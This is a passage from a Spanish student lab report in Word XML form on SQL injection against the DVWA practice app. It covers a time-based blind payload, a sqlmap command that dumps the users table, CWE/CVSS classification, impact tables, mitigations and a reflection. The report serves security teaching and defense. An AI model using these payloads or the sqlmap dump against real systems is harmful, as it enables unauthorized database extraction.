          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Técnica Time-based Blind:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315A469C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-- Si la condición es verdadera, el servidor tarda 5 segundos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1' AND IF(SUBSTRING(database(),1,1)='d', SLEEP(5), 0)-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCF0B42">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Automatización con sqlmap (blind):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F71A53A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>danielaguirre@kali:~$ sqlmap \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -u "http://&lt;IP&gt;/dvwa/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit" \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  --cookie="PHPSESSID=&lt;id&gt;;security=low" \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  --technique=B \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -D dvwa -T users --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144C1077">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[IMAGEN 11 — sqlmap extrayendo datos con técnica boolean-based blind — fecha visible]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E77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864"/>
          </w:tcPr>
          <w:p w14:paraId="23FC5D21"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="2EF29AD9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="4D2E5F38">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SQL Injection Blind</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5A1D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1ED39E">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>¿Muestra datos en respuesta?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BEB6D53">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Sí — directamente en pantalla</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ECC6F1B">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>No — solo true/false o tiempo de respuesta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7F4F8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7E7654AA">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Velocidad del ataque</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3184825D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Rápida — todos los datos en pocas peticiones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="503437FC">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Lenta — carácter por carácter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="231F6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369CA7">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Automatización</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22634FE3">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>sqlmap sin flags especiales</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D3A5405">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>sqlmap --technique=B o T</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5896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203CAE87">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Detectabilidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5DB0EF8C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Alta — muchos errores SQL en logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="2CF83499">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Baja — peticiones aparentemente normales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="266FD2C2">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>4. Clasificación técnica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FE4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864"/>
          </w:tcPr>
          <w:p w14:paraId="61FED4ED">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Referencia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="508B9FF9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Detalle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="24BC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31BB810">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CWE-89</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C83CF8F">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SQL Injection — neutralización impropia de elementos especiales en comandos SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="774BC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27626EAB">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CWE-209</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6DFF362B">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Generación de mensajes de error con información sensible (MySQL errors visibles)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7777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7D88F73">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE-2012-1823</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26C3E32A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SQLi crítico en PHP-CGI — ejemplo histórico de impacto masivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5086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CE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6E7537C0">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>OWASP Top 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="56139763">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A03:2021 – Injection (posición histórica #1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="291D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29EB3CD">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVSS v4.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B0FE9B1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>~9.8 Critical — extracción completa de BD + posible RCE via INTO OUTFILE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CFC5BB2">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>5. Impacto esperado en un sistema real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F02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864"/>
          </w:tcPr>
          <w:p w14:paraId="29497B64">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Dimensión CIA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="2BA32EDD">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Impacto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="4B8BF367">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Justificación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="50BD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59B8713">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Confidencialidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="063E6D6D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CRÍTICO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="766375CA">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Extracción total de la BD: credenciales, datos personales, PII, información financiera.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="06B0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CE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="517B574D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Integridad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="03F0F725">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CRÍTICO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="442E2417">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Modificación o eliminación de registros (UPDATE, DELETE, DROP TABLE).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2EB3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D95B0A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Disponibilidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="296EAACC">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ALTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="470D5EAF">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DROP DATABASE o SHUTDOWN pueden derribar completamente el sistema.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F2A9D7C">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>6. Propuesta de mitigación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46485FFF">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Prepared Statements / consultas parametrizadas — defensa definitiva:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F3903E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$stmt = $pdo-&gt;prepare("SELECT first_name, last_name FROM users WHERE user_id = ?");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$stmt-&gt;execute([$id]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE7F51D">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>ORM: frameworks como Eloquent o Doctrine generan queries parametrizadas automáticamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1122F8D3">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Deshabilitar mensajes de error detallados en producción (display_errors = Off).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032441C3">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Principio de mínimo privilegio en BD: el usuario de la app sin permisos DROP, CREATE, FILE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EECEB5">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>WAF con reglas anti-SQLi: detectar UNION SELECT, OR 1=1, comentarios SQL, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BC62D6">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Actualizar funciones deprecadas: migrar de mysql_query() a PDO o MySQLi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACFE71C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>──────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A94E68">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0733BC">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Reflexión Personal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063ABC3E">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A lo largo de este segundo laboratorio, las cuatro vulnerabilidades trabajadas confirman y profundizan el patrón identificado en el Informe #1: la confianza implícita en el input del usuario es la causa raíz de la mayoría de vulnerabilidades críticas en aplicaciones web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBE4960"/>
    <w:p w14:paraId="79714D9B">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Lo que más impresionó durante esta práctica fue la asimetría entre ataque y defensa: sqlmap extrae la base de datos completa en un solo comando que tarda segundos; Hydra encuentra la contraseña de admin en segundos contra un formulario sin protección. Construir esa misma defensa requiere días de trabajo de desarrollo, revisión y prueba.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141033C2"/>
    <w:p w14:paraId="3A64597D">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La diferencia entre SQL Injection y SQL Injection Blind fue un aprendizaje importante: la ausencia de mensajes de error no implica ausencia de vulnerabilidad. Un atacante paciente con las herramientas correctas puede extraer cualquier dato bit a bit, incluso cuando la aplicación aparentemente no da información.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A192C72"/>
    <w:p w14:paraId="08D04F01">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>File Inclusion RFI demostró que una sola línea mal configurada en php.ini (allow_url_include = On) puede convertir una funcionalidad de navegación en un vector de ejecución remota de código completa. La seguridad del servidor no depende solo del código de la aplicación, sino también de la configuración del entorno de ejecución.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744CF647"/>
    <w:p w14:paraId="5386315A">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Desde la perspectiva profesional, estos laboratorios establecen la base práctica para comprender por qué marcos como OWASP Top 10, controles del NIST CSF y prácticas como SAST/DAST en pipelines de CI/CD son imprescindibles en cualquier ciclo de desarrollo de software seguro. La seguridad no puede ser un parche posterior; debe estar integrada desde el diseño de la arquitectura.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676C6506"/>
    <w:p w14:paraId="09AA669D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41693ED6">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Referencias</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4707CC34">
      <w:pPr>
        <w:pStyle w:val="25"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP Foundation. (2021). OWASP Top Ten 2021. https://owasp.org/www-project-top-ten/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290F9032">
      <w:pPr>
        <w:pStyle w:val="25"/>
      </w:pPr>
      <w:r>
        <w:t>MITRE Corporation. (2024). CWE-89: SQL Injection. https://cwe.mitre.org/data/definitions/89.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D18CB5A">
      <w:pPr>
        <w:pStyle w:val="25"/>
      </w:pPr>
      <w:r>
        <w:t>MITRE Corporation. (2024). CWE-78: OS Command Injection. https://cwe.mitre.org/data/definitions/78.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BFE54A">
      <w:pPr>
        <w:pStyle w:val="25"/>
      </w:pPr>
      <w:r>
        <w:t>MITRE Corporation. (2024). CWE-22: Path Traversal. https://cwe.mitre.org/data/definitions/22.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE5DFB5">
      <w:pPr>
        <w:pStyle w:val="25"/>
      </w:pPr>
      <w:r>
        <w:t>MITRE Corporation. (2024). CWE-307: Improper Restriction of Excessive Authentication Attempts. https://cwe.mitre.org/data/definitions/307.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE5ADD4">
      <w:pPr>
        <w:pStyle w:val="25"/>
      </w:pPr>
      <w:r>
        <w:t>FIRST.org. (2023). Common Vulnerability Scoring System v4.0. https://www.first.org/cvss/v4-0/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27850B3F">
      <w:pPr>
        <w:pStyle w:val="25"/>
      </w:pPr>
      <w:r>
        <w:t>Stuttard, D., &amp; Pinto, M. (2011). The Web Application Hacker's Handbook (2.a ed.). Wiley.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46345D65">
      <w:pPr>
        <w:pStyle w:val="25"/>
      </w:pPr>
      <w:r>
        <w:t>PortSwigger. (2024). SQL Injection. https://portswigger.net/web-security/sql-injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7A7497">
      <w:pPr>
        <w:pStyle w:val="25"/>
      </w:pPr>
      <w:r>
        <w:t>PortSwigger. (2024). OS Command Injection. https://portswigger.net/web-security/os-command-injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BB24E4">
      <w:pPr>
        <w:pStyle w:val="25"/>
      </w:pPr>
      <w:r>
        <w:t>Hydra. (2024). THC-Hydra — Fast Network Login Cracker. https://github.com/vanhauser-thc/thc-hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D19172">
      <w:pPr>
        <w:pStyle w:val="25"/>
      </w:pPr>
      <w:r>
        <w:t>sqlmap Project. (2024). sqlmap - Automatic SQL injection tool. https://sqlmap.org/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1B4C"/>
    <w:rsid w:val="1DCB27C5"/>
    <w:rsid w:val="284B388C"/>
    <w:rsid w:val="59C903C5"/>
    <w:rsid w:val="5D923490"/>
    <w:rsid w:val="5F891239"/>
    <w:rsid w:val="651F6C22"/>
    <w:rsid w:val="656E29F6"/>
    <w:rsid w:val="6C7465CE"/>
    <w:rsid w:val="6CDE15A9"/>
    <w:rsid w:val="74010CA2"/>
    <w:rsid w:val="796A0F4F"/>
    <w:rsid w:val="7D194B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1018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Usuario</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-11T23:52:22Z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A0C5805C7CC7498ABF130758BD557AA1_13</vt:lpwstr>
  </property>
</Properties>
</file>